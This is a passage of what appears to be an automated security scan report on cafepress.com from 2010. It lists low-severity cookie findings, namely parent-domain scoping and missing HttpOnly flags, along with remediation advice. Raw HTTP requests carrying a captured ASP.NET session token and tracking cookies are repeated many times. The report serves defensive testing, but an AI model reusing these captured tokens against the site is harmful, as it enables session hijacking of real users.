Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

2.70. http://www.cafepress.com/sk/TheGamingApe previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/sk/TheGamingApe

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sk/TheGamingApe HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3. Cookie without HttpOnly flag set previous next
There are 76 instances of this issue:

/
/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536
/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
/+aprons
/+baby-blanket
/+baby-bodysuits
/+baby-hat
/+bags
/+boxers
/+bumper-stickers
/+buttons
/+calendars
/+clocks
/+coasters
/+eat_sleep_game_light_tshirt,299007536
/+framed-prints
/+greeting_cards
/+hats-caps
/+ipad-cases
/+iphone-cases
/+journals
/+keepsake_boxes
/+license_plate_frames
/+magnets
/+mousepads
/+mugs
/+ornaments
/+posters
/+stadium-blanket
/+steins
/+stocking
/+sweatshirts-hoodies
/+thermos
/+underwear-panties
/+water-bottles
/+womens-tank-tops
/+womens-thongs
/+yoga-mats
/1/1/index1.html
/1/1/indexd1.html
/1/3/index1.html
/1/3/indexb1.html
/1/3/indexc1.html
/TheGamingApe
/cp/catalogExp/RedirectWithSEOURL.aspx
/cp/catalogExp/addtocarthelper.aspx
/cp/info/about/
/cp/info/help/
/cp/info/help/index.aspx
/cp/info/sell/index.aspx
/cp/moredetails.aspx
/cp/products/
/cp/sitemap/
/cp/tags/
/cp/viewcart.aspx
/make/birth-announcements
/make/custom-baby-gear
/make/custom-buttons
/make/custom-hats
/make/custom-hoodies-sweatshirts
/make/custom-ipad-case
/make/custom-iphone-cases
/make/custom-mugs
/make/custom-stickers
/make/custom-stockings
/make/custom-t-shirts
/make/custom-thermos
/make/custom-water-bottles
/make/holiday-invitations
/make/holiday-photo-cards
/make/makeacard.aspx
/make/personalized-gifts
/make/personalized-ornaments
/sk/TheGamingApe
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

3.1. http://www.cafepress.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.2. http://www.cafepress.com/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/%20Eat%20Sleep%20Game%20Light%20T-Shirt,299007536

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:48 GMT; path=/
tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:48 GMT; path=/
cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

3.3. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:56:00 GMT; path=/
tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:56:00 GMT; path=/
cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/
cp_st=8a6d1%00%0d%0aaf2c26c8a28; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/
cp_sc=100010; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

3.4. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+Eat+Sleep+Game+Light+T-Shirt%2C299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.5. http://www.cafepress.com/+aprons previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+aprons

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100178; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:54 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+aprons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.6. http://www.cafepress.com/+baby-blanket previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+baby-blanket

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100459; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:52 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+baby-blanket HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.7. http://www.cafepress.com/+baby-bodysuits previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+baby-bodysuits

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
cp_sc=100122; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:16:53 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /+baby-bodysuits HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.8. http://www.cafepress.com/+baby-hat previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/+baby-hat

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
